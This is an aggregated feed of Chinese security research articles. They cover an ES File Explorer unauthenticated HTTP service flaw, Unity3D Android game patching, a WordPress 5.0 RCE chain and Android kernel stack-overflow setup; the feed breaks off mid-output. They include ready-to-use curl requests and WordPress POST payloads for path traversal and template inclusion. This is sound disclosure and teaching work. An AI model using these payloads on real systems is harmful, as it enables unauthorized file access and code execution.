ES 文件浏览器在运行时会创建一个绑定在 59777 端口的 HTTP 服务,在该服务提供了 10+ 个命令,用于访问用户手机的数据以及执行应用程序;但该服务并没有对请求进行校验,从而导致出现安全漏洞。

影响范围
<= ES 文件浏览器 v4.1.9.7.4

修复方式
前往应用商城下载最新版即可。修复该漏洞的版本为(v4.1.9.9)

0x02 漏洞复现

漏洞复现环境

  • Windows 7
  • OPPP R7
  • ES 文件浏览器v4.1.9.4
  • ADB (Android Debug Bridge)

复现过程

  1. 通过 USB 连接手机与电脑,并打开 USB 调试。

  2. 通过 ADB 检查设备连接情况,并安装 ES 文件浏览器v4.1.9.4 到设备上。

  3. 在手机上可以看到 ES 文件浏览器已经安装成功,启动该应用;通过 ADB 查看当前网络端口情况,可以看到 59777 端口已经打开。

  4. 将手机和电脑配置到同一 WIFI 下,便于我们进行访问测试。

  5. 构造 HTTP 数据报文,将命令封装至 Json 数据中,请求 59777 端口;这里演示 getDeviceInfo命令,可以看到成功返回了设备的信息。

0x03 漏洞分析

反编译dex文件
对 ES 文件浏览器v4.1.9.4 进行分析,首先将该 APK 进行解压,可以看到其中包含了三个 *.dex 文件。使用 dex2jar 工具分别这三个文件进行反编译,得到三个 *.jar 文件。

使用 jd-gui 工具加载这三个 jar 文件,使用关键词搜索 59777commandgetDeviceInfo 以快速定位到漏洞逻辑部分,其位于 classes2-dex2jar.jar 下的 com.estrongs.android.f.a 路径下。

ES HTTP支持的指令

上图中,可以看到除了 getDeviceInfo 命令,该 HTTP 服务还支持不少的命令:

command description
listFiles 列出所有的文件
listPics 列出所有的图片
listVideos 列出所有的视频
listAudios 列出所有的音频
listApps 列出安装的应用
listAppsSystem 列出系统自带的应用
listAppsPhone 列出通信相关的应用
listAppsSdcard 列出安装在sd卡上的应用
listAppsAll 列出所有的应用
getAppThumbnail 列出指定应用的图标
appLaunch 启动制定的应用
appPull 从设备上下载应用
getDeviceInfo 获取系统信息

除了以上列出的命令,还可以直接访问 url+系统文件路径,直接访问文件数据:

curl --header "Content-Type: application/json" http://192.168.0.105:59777/etc/wifi_mos.sh

命令执行示例(列出所有的文件):

curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777

命令处理

其命令处理部分逻辑大致就是进行相应的逻辑处理,并将执行的结果封装为 Json 数据格式,拼接为 HTTP 协议进行返回,下面是 getDeviceInfo 的处理逻辑:

通过以上的功能逻辑可以看到,HTTP 服务是 ES 文件浏览器的一个内置功能,可能是用于不同设备之间的共享,但由于没有对请求进行校验,导致安全问题的出现。

0x04 补丁分析

下载已补丁的版本 v4.1.9.9.3,同样对 APK 进行解包,通过 dex2jar 反编译为 *.jar 文件,对文件进行分析。

POST 请求校验

v4.1.9.9.3 版本可能重新进行了代码混淆,其反编译后的机构和 v4.1.9.4 有很大的差别;我们仍然使用关键词搜索来快速定位到之前的漏洞逻辑部分。位于 classes3-dex2jar.jar 下的 es.qg 路径下。

从上图可以看到,标注地方是新版本所添加的补丁,在处理请求时,首先进行检查,检查失败的情况下返回 400 错误。

跟入 ap.d() 函数中,可以看到两个关键检查函数:

1.检查函数1

该函数获取了 UIModeManager 对象,当该对象的类型等于 4 时,返回 true,通过查阅官方文档,在该处数值 4 对应的类型为 UI_MODE_TYPE_TELEVISION,也就是安卓TV的类型。说明官方将该功能限制在安卓TV的设备上了。

2.检查函数2

检查函数2依然是对安卓TV的判断,在上一步函数获取了屏幕的尺寸并转换成了一个值,在该处判断值要大于 20,才能返回 true

Andoird TV会受到威胁?

根据以上补丁的情况来看,可以猜测到 Android TV 似乎受到该漏洞的威胁,但实际上并不会。因为 Android TV 处理流程和手机版的不同,本身也不受该漏洞的影响。

将有漏洞的版本(v4.1.9.4)安装至 Android TV 上;经过测试可以发现,在 Android TV 下发起请求将直接返回 500 错误。

原因是程序在判断设备是 TV 时,会首先提前做一次来源 IP 检查(判断是否由是本地发起的请求,检查失败也返回 500 错误),随后再检查可访问的路径,如下函数(classes3-dex2jar.jar/es.qj$a):

但经过测试,发现该数组的值为 NULL,直接返回 false

最终跳转至该语句,返回 500 错误。所以 Android TV 也不会受到该漏洞的影响。

Get请求列目录修复

在上文中还提到发送 GET 请求可以列文件,在新版本也进行了修复。

当以 GET 方式发起请求时,将进入 ai.bK() 的函数判断,在该函数中检查了 HTTP 的数据必须以 http://127.0.0.1: 开头,才可以返回文件列表;HTTP 协议都是以 GET/POST/... 开头,肯定不会以这个方式开头,虽然不太理解这个检查,但还算是解决了列目录的问题。

0x05 总结

通过以上的分析,可以完整的了解到 ES 文件浏览器安全漏洞的触发过程以及补丁情况;整体看来就是,开发者在设计共享访问功能的时候忽略对请求的检查,从而导致的安全漏洞。

References:


Paper

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/831/

 

News stories from Wednesday 27 February, 2019

Favicon for 知道创宇 17:39 简单 Unity3D 安卓游戏逆向思路 » Post from 知道创宇 Visit off-site link

作者:dawu@知道创宇404实验室
时间:2019/02/25

0x00 前言

这是一篇游戏引发的简单技术文。

起因是个人很喜欢玩 google play 上的一些数字类型(角色攻击是线性增长,怪物指数变强,到后期越打不过,通过重生增强属性变强)的小游戏。但是这种游戏仍旧存在一定缺陷,前期资源不多,玩的太慢、玩的时间长了,就感觉没意思,就不想玩了,所以在玩到游戏中期的时候,往往都会去网上搜索XXX破解版/内购版,快速进入后期然后放弃这款游戏。

这样的做法其实是很不安全的,因为无法判断XXX破解版/内购版在破解/内购之后还做了什么。所以我最后的解决办法是,逆向这些apk,修改游戏逻辑。让我在玩的时候,可以快速度过缓慢的前期。

逆向了几个玩过的游戏,发现这类游戏使用Unity3D开发的居多。因此本文将介绍简单Unity3D类安卓游戏的逆向修改思路。

0x01 准备工具

逆向最简单的Unity3D类安卓游戏建议使用安装好 JAVA 环境的Windows系统(涉及到dll文件的修改,所以Windows平台更加适合)。

1.1 安卓 APK 逆向三件套

一般 APK 逆向,常使用到 apktooldex2jarjd-gui。在逆向 Unity3D 安卓游戏时,仅仅只需要使用到 apktool

  • Apktool: 用于解压/重新打包安卓APK。
  • dex2jar: 将解压出来的dex文件变成jar,方便使用jd-gui查看
  • jd-gui: 查看dex文件逻辑

1.2 dll文件逆向三件套

因为一般的 Unity3D 安卓游戏的主逻辑都在 asserts/bin/data/Managed/Assembly-CSarp.dll 中,所以我们还需要 dll文件逆向/重新打包 的工具。

  • ILSpy: 用于查看dll程序逻辑
  • ILDASM: 用于反编译dll文件,生成il文件(存放了dll反编译后的指令)和res文件(反编译后的资源文件),可以安装Windows SDK或者从网上下载。
  • ilasm: .net4.0自带了,位置在 C:\Windows\Microsofr.NET\Framework\v4.0.30319\ilasm.exe

1.3 生成重新打包的自签名证书

修改完 apk 之后,需要对 apk 进行签名。该命令用于生成签名的证书。

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 0validity 10000
# 记住设置的密码,最后自签名应用的时候需要输入密码

0x02 开发一个简单的 Unity3D 游戏

用Unity3D开发了一个简单小游戏作为本文的样例,逻辑十分简单:

  1. 英雄每过一关战斗力都会增加100.
  2. 怪物的战斗力为 Math.pow(2,当前关数)
  3. 当英雄战斗力小于怪物的战斗力时,英雄无法闯关。英雄可以考虑修炼或者重生提高战斗力。
  4. 英雄每次修炼战斗力都会增加1000.
  5. 英雄选择重生后,关卡数清零,需要重新闯关,但英雄初始战斗力会增加 2000 * 重生前闯关数。

具体代码可以参考 Github

0x03 游戏逆向步骤

1.使用 apktool 解压游戏安装包

java -jar apktool.jar d game.apk

2.提取出 game/assets/bin/data/Managed/Assembly-CSarp.dll ,使用 ILSpy 打开即可看到 dll 里面的逻辑。

注: Unity3D开发的安卓游戏,其核心代码都在这个 dll 文件中,所以逆向/修改这个 dll 文件就可以了。这也是 Unity3D 和 其它安卓逆向不同的地方。

在没有混淆的情况下,反编译出的函数内容和原内容十分相似:

ILSpy 反编译的 Click1 内容

Click1 的原始代码3.找到关键函数、关键逻辑后,就可以尝试反编译 dll 文件并修改。使用 ILDASM 将 dll 文件反编译成 il 文件。使用 ILDASM 打开 dll 文件后, File -> dump 就可以导出反编译结果了。

4.根据步骤2,就很容易理解逻辑了,然后根据速查表,就可以知道在步骤3导出的il文件中修改哪里了。例如步骤2中 Click1 就是游戏中 点击闯关 按钮绑定的逻辑。闯关的关键判断就在: info.hero_power + info.temp_power + info.add_power >= info.monster_power。所以打开步骤3中生成的 .il 文件,结合 .NET IL 指令速查表修改这部分对应的关键逻辑即可。

修改为 info.hero_power + info.temp_power + info.add_power != info.monster_power 就可以通过此处的逻辑判断。

5.修改关键逻辑后,通过重新编译 dll 文件、apk 文件、签名修改后的 apk 就可以在手机上安装运行了。

重新编译dll文件命令如下:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe game.il /output=Assembly-CSarp.dll /dll

将重新编译的dll放回 game/assets/bin/data/Managed/ 目录下,使用apktool重新打包apk:

java -jar apktool.jar b game
cp game/dist/game.apk ./

自签名应用:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore game.apk alias_name

6.修改成功,开局修炼一次后,就可以无限闯关。顺利到达第30关。

0x04 杂谈和总结

  1. Unity3D有一个较为明显的特征: 开局会显示游戏LOGO。这个可以作为判断一个游戏是不是Unity3D开发的小参考。
  2. 文中的demo到了31关,就会发生整型溢出,怪物战斗力变为负数。原因是怪物战斗力的值为int型。在以前玩过的某个后期极度不平衡的游戏中,我的确遇到过整型溢出的问题。造成花钱升级还能增余额的情况。
  3. 在修改游戏之前把游戏语言调整为英文有助于在逆向的时候理解各个函数的意义(对于没有混淆的应用)。
  4. 游戏修改之后,很容易丧失原本的乐趣,变成纯粹的数字游戏。谨慎修改!

0x05 参考链接

  1. Apktool
  2. ILSpy
  3. .NET IL 指令速查表
  4. Unity3d类安卓游戏逆向分析初探

Paper

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/829/

Favicon for 知道创宇 17:36 WordPress 5.0 RCE 详细分析 » Post from 知道创宇 Visit off-site link
作者:LoRexxar'@知道创宇404实验室
时间:2019年2月22日
2月20号,RIPS团队在官网公开了一篇WordPress 5.0.0 Remote Code Execution,CVE编号CVE-2019-6977,文章中主要提到在author权限账号下,可以通过修改Post Meta变量覆盖、目录穿越写文件、模板包含3个漏洞构成一个RCE漏洞。

但在原文中,作者只大致描述了漏洞原理,其中大量的漏洞细节被省略,甚至部分的利用和后端服务器也有相对应的关系,所以在复现的过程中遇到了各种问题,我们花了大量的时间分析代码,最终终于完全还原了该漏洞,其中部分关键利用点用了和原文有些许差异的利用方式(原文说的太含糊其辞,无法复现)。在下面的分析中,我会尽量按照复现过程中的思考方式及流程,以便读者理解。

感谢在复现、分析过程中一起的小伙伴@Badcode,帮助我修改了很多错误的@Venenof7、@sysorem,给我提供了很多帮助:>

漏洞要求

在反复斟酌漏洞条件之后,我们最终把漏洞要求约束为

影响包括windows、linux、mac在内的服务端,后端图片处理库为gd/imagick都受到影响,只不过利用难度有所差异。

其中,原文提到只影响release 5.0.0版,但现在官网上可以下载的5.0.0已经修复该漏洞。实际在WordPress 5.1-alpha-44280更新后未更新的4.9.9~5.0.0的WordPress都受到该漏洞影响。

漏洞复现

下面的复现流程包含部分独家利用以及部分与原文不符的利用方式,后面的详情会解释原因。

传图片

改信息

保留该数据包,并添加POST

&amp;meta_input[_wp_attached_file]=2019/02/2-4.jpg#/../../../../themes/twentynineteen/32.jpg

裁剪

同理保留改数据包,并将POST改为下面的操作,其中nonce以及id不变

action=crop-image&amp;_ajax_nonce=8c2f0c9e6b&amp;id=74&amp;cropDetails[x1]=10&amp;cropDetails[y1]=10&amp;cropDetails[width]=10&amp;cropDetails[height]=10&amp;cropDetails[dst_width]=100&amp;cropDetails[dst_height]=100

触发需要的裁剪

图片已经过去了

包含,我们选择上传一个test.txt,然后再次修改信息,如前面

&amp;meta_input[_wp_page_template]=cropped-32.jpg

点击查看附件页面,如果图片被裁剪之后仍保留敏感代码,则命令执行成功。

详细分析

下面我们详细分析一下整个利用过程,以及在各个部分踩的坑。我们可以简单的把漏洞利用链分为4个大部分。

1、通过Post Meta变量覆盖,修改媒体库中图片的_wp_attached_file变量。

这个漏洞是整个利用链的核心点,而WordPress的修复方式也主要是先修复了这个漏洞。WordPress很良心的在所有的release版本中都修复了这个问题(官网下载的5.0.0已经修复了),由于原文中曾提到整个利用链受到4.9.9和5.0.1的另一个安全补丁影响,所以只有5.0.0受影响。在分析还原WordPress的更新commit中,我们寻找到了这个漏洞的修复commit,并获得了受该漏洞影响的最新版本为WordPress commit <= 43bdb0e193955145a5ab1137890bb798bce5f0d2 (WordPress 5.1-alpha-44280)

2、通过图片的裁剪功能,将裁剪后的图片写到任意目录下(目录穿越漏洞)

在WordPress的设定中,图片路径可能会收到某个插件的影响而不存在,如果目标图片不在想要的路径下时,WordPress就会把文件路径拼接为形似http://127.0.0.1/wp-content/uploads/2019/02/2.jpg 的url链接,然后从url访问下载原图

如果我们构造?或者#后面跟路径,就能造成获取图片位置和写入图片位置的不一致。。

这部分最大问题在于,前端的裁剪功能并不是存在漏洞的函数,我们只能通过手动构造这个裁剪请求来完成。

action=crop-image&amp;_ajax_nonce=8c2f0c9e6b&amp;id=74&amp;cropDetails[x1]=10&amp;cropDetails[y1]=10&amp;cropDetails[width]=10&amp;cropDetails[height]=10&amp;cropDetails[dst_width]=100&amp;cropDetails[dst_height]=100

ps: 当后端图片库为Imagick时,Imagick的Readimage函数不能读取远程http协议的图片,需要https.

3、通过Post Meta变量覆盖,设置_wp_page_template变量。

这部分在原文中一笔带过,也是整个分析复现过程中最大的问题,现在公开的所有所谓的WordPress RCE分析,都绕开了这部分。其中有两个最重要的点:

  • 如何设置这个变量?
  • 如何触发这个模板引用?

这个部分在下文中会详细解释。

4、如何让图片在被裁剪过之后,保留或者出现包含php敏感代码。

这部分就涉及到了后端图片库的问题,WordPress用到的后端图片处理库有两个,gd和imagick,其中默认优先使用imagick做处理。

  • imagick
    利用稍微比较简单,imagick不会处理图片中的exif部分。将敏感代码加入到exif部分就可以不会改动。
  • gd
    gd的利用就比较麻烦了,gd不但会处理图片的exif部分,还会删除图片中出现的php代码。除非攻击者通过fuzz获得一张精心构造的图片,可以在被裁剪处理之后刚好出现需要的php代码(难度较高)。

最后通过链接上述4个流程,我们就可以完整的利用这个漏洞了,接下来我们详细分析一下。

Post Meta变量覆盖

当你对你上传的图片,编辑修改其信息时,你将会触发action=edit_post

wp-admin/includes/post.php line 208

post data来自于POST

如果是修复过的,在line 275行有修复patch

$translated = _wp_get_allowed_postdata( $post_data );

https://github.com/WordPress/WordPress/commit/43bdb0e193955145a5ab1137890bb798bce5f0d2

这个patch直接禁止了传入这个变量

<span class="kd">function</span> <span class="nx">_wp_get_allowed_postdata</span><span class="p">(</span> <span class="nx">$post_data</span> <span class="o">=</span> <span class="kc">null</span> <span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span> <span class="nx">empty</span><span class="p">(</span> <span class="nx">$post_data</span> <span class="p">)</span> <span class="p">)</span> <span class="p">{</span>
        <span class="nx">$post_data</span> <span class="o">=</span> <span class="nx">$_POST</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// Pass through errors</span>
    <span class="k">if</span> <span class="p">(</span> <span class="nx">is_wp_error</span><span class="p">(</span> <span class="nx">$post_data</span> <span class="p">)</span> <span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nx">$post_data</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="nx">array_diff_key</span><span class="p">(</span> <span class="nx">$post_data</span><span class="p">,</span> <span class="nx">array_flip</span><span class="p">(</span> <span class="nx">array</span><span class="p">(</span> <span class="s1">'meta_input'</span><span class="p">,</span> <span class="s1">'file'</span><span class="p">,</span> <span class="s1">'guid'</span> <span class="p">)</span> <span class="p">)</span> <span class="p">);</span>
<span class="p">}</span>

一路跟下去这个函数可以一直跟到wp-includes/post.php line 3770

update_post_meta会把所有字段遍历更新

就会更新数据库中的相应字段

配合变量覆盖来目录穿越写文件

根据原文的描述,我们首先需要找到相应的裁剪函数

/wp-admin/includes/image.php line 25

这里传入的变量src就是从修改过的_wp_attached_file而来。

在代码中,我们可以很轻易的验证一个问题。在WordPress的设定中,图片路径可能会受到某个插件的影响而不存在,如果目标图片不在想要的路径下时,WordPress就会把文件路径拼接为形似 http://127.0.0.1/wp-content/uploads/2019/02/2.jpg 的url链接,然后从url访问下载原图

这里的_load_image_to_edit_path就是用来完成这个操作的。

也正是因为这个原因,假设我们上传的图片名为2.jpg,则原本的_wp_attached_file2019/02/2.jpg

然后我们通过Post Meta变量覆盖来修改_wp_attached_file2019/02/1.jpg?/../../../evil.jpg

这里的原图片路径就会拼接为{wordpress_path}/wp-content/uploads/2019/02/1.jpg?/../../../evil.jpg,很显然这个文件并不存在,所以就会拼接链接为http://127.0.0.1/wp-content/uploads/2019/02/2.jpg?/../../../evil.jpg,后面的部分被当作GET请求,原图片就会成功的获取到。

紧接着进入save函数的新图片路径会拼接为{wordpress_path}/wp-content/uploads/2019/02/1.jpg?/../../../cropped-evil.jpg,我们就能成功写入新文件了。

后面的save函数会调用你当前图片库的裁剪功能,生成图片结果。(默认为imagick)

/wp-includes/class-wp-image-editor.php line 394

但这里看上去没有任何限制,实际上不是的。在写入的目标目录下,存在一个假目录,为1.jpg?

  • 而linux、mac支持这种假目录,可以使用?号
  • 但windows在路径中不能有?号,所以这里改用了#号
&amp;meta_input[_wp_attached_file]=2019/02/2-1.jpg#/../../../evil.jpg

成功写入文件

cropped-evil.jpg

控制模板参数来导致任意文件包含

进度进展到这就有点儿陷入僵局,因为原文中关于这部分只用了一句话带过,在实际利用的过程中遇到了很多问题,甚至不同版本的WordPress会有不同的表现,其中诞生了多种利用方式,这里我主要讲1种稳定利用的方式。

设置_wp_page_template

首先我们先正向分析,看看在什么情况下我们可以设置_wp_page_template

首先可以肯定的是,这个变量和_wp_attached_file一样都属于Post Meta的一部分,可以通过前面的操作来对这个变量赋值

但实际测试过程中,我们发现,我们并不能在任何方式下修改并设置这个值。

/wp-includes/post.php line 3828

  • 如果你设置了这个值,但这个文件不存在,则会被定义为default
  • 如果该值被设置,则没办法通过这种方式修改。

所以这里我们可能需要新传一个媒体文件,然后通过变量覆盖来设置这个值。

加载模板

当我们成功设置了该变量之后,我们发现,并不是所有的页面都会加载模板,我们重新回到代码中。

最终加载模板的地方在

wp-includes/template.php line 634

只要是在$template_names中需要被加载的文件名,会在当前主题的目录下遍历加载。

回溯跟入

wp-includes/template.php line 23

继续回溯我们就能发现一些端倪,当你访问页面的时候,页面会通过你访问的页面属性,调用不同的模板加载函数。

wp-includes/template-loader.php line 48

在这么多的模板调用函数中只有两个函数get_page_templateget_single_template这两个在函数中调用了get_page_template_slug函数。

wp-includes/template.php line 486

get_page_template_slug函数从数据库中获取了_wp_page_template

/wp-includes/post-template.php line 1755

只要我们能让模板加载时进入get_page_templateget_single_template,我们的模板就可以成功被包含。

由于代码和前端的差异,我们也没有完全找到触发的条件是什么,这里选了一个最简单的,即上传一个txt文件在资源库,然后编辑信息并预览。

生成图片马

这部分就涉及到了后端图片库的问题,WordPress用到的后端图片处理库有两个,gd和imagick,其中默认优先使用imagick做处理。

  • imagick

利用稍微比较简单,imagick不会处理图片中的exif部分。将敏感代码加入到exif部分就可以不会改动。

  • gd

gd的利用就比较麻烦了,gd不但会处理图片的exif部分,还会删除图片中出现的php代码。除非攻击者通过fuzz获得一张精心构造的图片,可以在被裁剪处理之后刚好出现需要的php代码(难度较高)。

由于这不是漏洞最核心的部分,这里就不赘述了。

修复

1、由于该漏洞主要通过图片马来完成RCE,而后端图片库为gd时,gd会去除图片信息中exif部分,并去除敏感的php代码。但如果攻击者精心设计一张被裁剪后刚好生成含有敏感代码的图片时,就可以造成RCE漏洞。如果后端图片库为imagick时,则将敏感代码加入到图片信息的exif部分,就可以造成RCE漏洞。

官网上可供下载的所有release版本中都修复了这个漏洞,更新至最新版或者手动将当前版本覆盖安装即可。

2、 通用防御方案
使用第三方防火墙进行防护(如创宇盾[https://www.yunaq.com/cyd/])。

3、技术业务咨询
知道创宇技术业务咨询热线 :
400-060-9587(政府,国有企业)、028-68360638(互联网企业)

总结

整个RCE的利用链由4部分组成,深入WordPress的底层Core逻辑,原本来说这4个部分无论哪个都很难造成什么危害,但却巧妙地连接在一起,并且整个部分意外的都是默认配置,大大增加了影响面。在安全程度极高的WordPress中能完成这种的攻击利用链相当难得,从任何角度都是一个非常nice的漏洞:>

最后再次感谢我的小伙伴们以及整个过程中给我提供了很大帮助的朋友们:>


Paper

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/822/

News stories from Friday 15 February, 2019

Favicon for 知道创宇 10:09 从 0 开始学 Linux 内核之 android 内核栈溢出 ROP 利用 » Post from 知道创宇 Visit off-site link

作者:Hcamael@知道创宇404实验室

最近在研究一个最简单的android内核的栈溢出利用方法,网上的资料很少,就算有也是旧版内核的,新版的内核有了很大的不同,如果放在x86上本应该是很简单的东西,但是arm指令集有很大的不同,所以踩了很多坑

把上一篇改了一下名字,换成了从0开始学Linux内核,毕竟不是专业搞开发的,所以驱动开发没必要学那么深,只要会用,能看懂代码基本就够用了。本篇开始学Linux kernel pwn了,而内核能搞的也就是提权,而提权比较多人搞的就是x86和arm指令集的Linux系统提权了,arm指令集的基本都是安卓root和iOS越狱,而mips指令集的几乎没啥人在搞,感觉是应用场景少。

环境准备

android内核编译

下载相关源码依赖

android内核源码使用的是goldfish[1],直接clone下来,又大又慢又久,在git目录下编译也麻烦,所以想搞那个版本的直接下那个分支的压缩包就好了

本文使用的工具的下载地址:

PS:git clone速度慢的话可以使用国内镜像加速:s/android.googlesource.com/aosp.tuna.tsinghua.edu.cn/

<span class="token comment"># 下载源码
</span>$ wget https<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>android<span class="token punctuation">.</span>googlesource<span class="token punctuation">.</span>com<span class="token operator">/</span>kernel<span class="token operator">/</span>goldfish<span class="token operator">/</span><span class="token operator">+</span>archive<span class="token operator">/</span>android<span class="token operator">-</span>goldfish<span class="token number">-3.10</span><span class="token punctuation">.</span>tar<span class="token punctuation">.</span>gz
$ tar zxf goldfish<span class="token operator">-</span>android<span class="token operator">-</span>goldfish<span class="token number">-3.10</span><span class="token punctuation">.</span>tar<span class="token punctuation">.</span>gz
<span class="token comment"># 下载编译工具
</span>$ git clone https<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>android<span class="token punctuation">.</span>googlesource<span class="token punctuation">.</span>com<span class="token operator">/</span>platform<span class="token operator">/</span>prebuilts<span class="token operator">/</span>gcc<span class="token operator">/</span>linux<span class="token operator">-</span>x86<span class="token operator">/</span>arm<span class="token operator">/</span>arm<span class="token operator">-</span>linux<span class="token operator">-</span>androideabi<span class="token number">-4.6</span>
<span class="token comment"># 下载一键编译脚本
</span>$ git clone https<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>android<span class="token punctuation">.</span>googlesource<span class="token punctuation">.</span>com<span class="token operator">/</span>platform<span class="token operator">/</span>prebuilts<span class="token operator">/</span>qemu<span class="token operator">-</span>kernel<span class="token operator">/</span>
<span class="token comment"># 只需要kernel-toolchain和build-kernel.sh
</span>$ cp qemu<span class="token operator">-</span>kernel<span class="token operator">/</span>build<span class="token operator">-</span>kernel<span class="token punctuation">.</span>sh goldfish<span class="token operator">/</span>
$ cp <span class="token operator">-</span>r qemu<span class="token operator">-</span>kernel<span class="token operator">/</span>kernel<span class="token operator">-</span>toolchain<span class="token operator">/</span> goldfish<span class="token operator">/</span>

修改内核

学android kernel pwn最初看的是Github上的一个项目[3],不过依赖的是旧内核,估计是android 3.4以下的内核,在3.10以上的有各种问题,所以我自己做了些修改,也开了一个Github源:https://github.com/Hcamael/android_kernel_pwn

对kernel源码有两点需要修改:

1.添加调试符号

首先需要知道自己要编译那个版本的,我编译的是32位Android内核,使用的是goldfish_armv7,配置文件在: arch/arm/configs/goldfish_armv7_defconfig

但是不知道为啥3.10里没有该配置文件,不过用ranchu也一样:

给内核添加调试符号,只需要在上面的这个配置文件中添加:CONFIG_DEBUG_INFO=y,如果是goldfish就需要自己添加,ranchu默认配置已经有了,所以不需要更改。

2.添加包含漏洞的驱动

目的是研究Android提权利用方法,所以是自己添加一个包含栈溢出的驱动,该步骤就是学习如何添加自己写的驱动

上面给了一个我的Github项目,把该项目中的vulnerabilities/目录复制到内核源码的驱动目录中:

$ cp vulnerabilities<span class="token operator">/</span> goldfish<span class="token operator">/</span>drivers<span class="token operator">/</span>

修改Makefile:

$ <span class="token keyword">echo</span> <span class="token string">"obj-y += vulnerabilities/"</span> <span class="token operator">&gt;</span><span class="token operator">&gt;</span> drivers<span class="token operator">/</span>Makefile

导入环境变量后,使用一键编译脚本进行编译:

$ export PATH<span class="token operator">=</span><span class="token operator">/</span>root<span class="token operator">/</span>arm<span class="token operator">-</span>linux<span class="token operator">-</span>androideabi<span class="token number">-4.6</span><span class="token operator">/</span>bin<span class="token operator">/</span><span class="token punctuation">:</span><span class="token property">$PATH</span>
$ <span class="token punctuation">.</span><span class="token operator">/</span>build<span class="token operator">-</span>kernel<span class="token punctuation">.</span>sh <span class="token operator">--</span>config<span class="token operator">=</span><span class="token string">"ranchu"</span>

PS: 在docker中复现环境的时候遇到一个问题,可以参考:https://stackoverflow.com/questions/42895145/cross-compile-the-kernel

编译好后的内核在/tmp/qemu-kernel目录下,有两个文件,一个zImage,内核启动镜像,一个vmlinux是kernel的binary文件,丢ida里面分析内核,或者给gdb提供符号信息

Android模拟环境准备

内核编译好后,就是搞Android环境了,可以直接使用Android Studio[2]一把梭,但是如果不搞开发的话,感觉Studio太臃肿了,下载也要下半天,不过还好,官方提供了命令行工具,觉得Studio太大的可以只下这个

PS: 记得装java,最新版的java 11不能用,我用的是java 8

建一个目录,然后把下载的tools放到这个目录中

$ mkdir android_sdk
$ mv tools android_sdk<span class="token operator">/</span>

首先需要使用tools/bin/sdkmanager装一些工具

<span class="token comment"># 用来编译android binary(exp)的,如果直接用arm-liunx-gcc交叉编译工具会缺一些依赖,解决依赖太麻烦了,还是用ndk一把梭方便
</span>$ <span class="token punctuation">.</span><span class="token operator">/</span>bin<span class="token operator">/</span>sdkmanager <span class="token operator">--</span>install <span class="token string">"ndk-bundle"</span>
<span class="token comment"># android模拟器
</span>$ <span class="token punctuation">.</span><span class="token operator">/</span>bin<span class="token operator">/</span>sdkmanager <span class="token operator">--</span>install <span class="token string">"emulator"</span>
<span class="token comment"># avd
</span>$ <span class="token punctuation">.</span><span class="token operator">/</span>bin<span class="token operator">/</span>sdkmanager <span class="token operator">--</span>install <span class="token string">"platforms;android-19"</span>
$ <span class="token punctuation">.</span><span class="token operator">/</span>bin<span class="token operator">/</span>sdkmanager <span class="token operator">--</span>install <span class="token string">"system-images;android-19;google_apis;armeabi-v7a"</span>
<span class="token comment"># 其他
</span>$ <span class="token punctuation">.</span><span class="token operator">/</span>bin<span class="token operator">/</span>sdkmanager <span class="token operator">--</span>install <span class="token string">"platform-tools"</span>

PS:因为是32位的,所以选择的是armeabi-v7a

PSS: 我一共测试过19, 24, 25,发现在24,25中,自己写的包含漏洞的驱动只有特权用户能访问,没去仔细研究为啥,就先使用低版本的android-19了

创建安卓虚拟设备:

<span class="token punctuation">.</span><span class="token operator">/</span>bin<span class="token operator">/</span>avdmanager create avd <span class="token operator">-</span>k <span class="token string">"system-images;android-19;google_apis;armeabi-v7a"</span> <span class="token operator">-</span>d <span class="token number">5</span> <span class="token operator">-</span>n <span class="token string">"kernel_test"</span>

启动:

$ export kernel_path<span class="token operator">=</span>ranchu_3<span class="token punctuation">.</span>10_zImage
或者
$ export kernel_path<span class="token operator">=</span>goldfish_3<span class="token punctuation">.</span>10_zImage
$ <span class="token punctuation">.</span><span class="token operator">/</span>emulator  <span class="token operator">-</span>show<span class="token operator">-</span>kernel <span class="token operator">-</span>kernel <span class="token property">$kernel_path</span> <span class="token operator">-</span>avd kernel_test <span class="token operator">-</span>no<span class="token operator">-</span>audio <span class="token operator">-</span>no<span class="token operator">-</span>boot<span class="token operator">-</span>anim <span class="token operator">-</span>no<span class="token operator">-</span>window <span class="token operator">-</span>no<span class="token operator">-</span>snapshot <span class="token operator">-</span>qemu  <span class="token operator">-</span>s

去测试下我写的exp:

$ cd <span class="token operator">~</span><span class="token operator">/</span>goldfish<span class="token operator">/</span>drivers<span class="token operator">/</span>vulnerabilities<span class="token operator">/</span>stack_buffer_overflow<span class="token operator">/</span>solution
$ <span class="token punctuation">.</span><span class="token operator">/</span>build_and_run<span class="token punctuation">.</span>sh

编译好了之后运行,记得要用普通用户运行:

<a class="token email-link" href="mailto:shell@generic">shell@generic</a><span class="token punctuation">:</span><span class="token operator">/</span> $ id
id
uid<span class="token operator">=</span><span class="token function">2000<span class="token punctuation">(</span></span>shell<span class="token punctuation">)</span> gid<span class="token operator">=</span><span class="token function">1007<span class="token punctuation">(</span></span>log<span class="token punctuation">)</span> context<span class="token operator">=</span>u<span class="token punctuation">:</span>r<span class="token punctuation">:</span>init_shell<span class="token punctuation">:</span>s0
<a class="token email-link" href="mailto:shell@generic">shell@generic</a><span class="token punctuation">:</span><span class="token operator">/</span> $ <span class="token operator">/</span>data<span class="token operator">/</span>local<span class="token operator">/</span>tmp<span class="token operator">/</span>stack_buffer_overflow_exploit
<span class="token operator">/</span>data<span class="token operator">/</span>local<span class="token operator">/</span>tmp<span class="token operator">/</span>stack_buffer_overflow_exploit
start
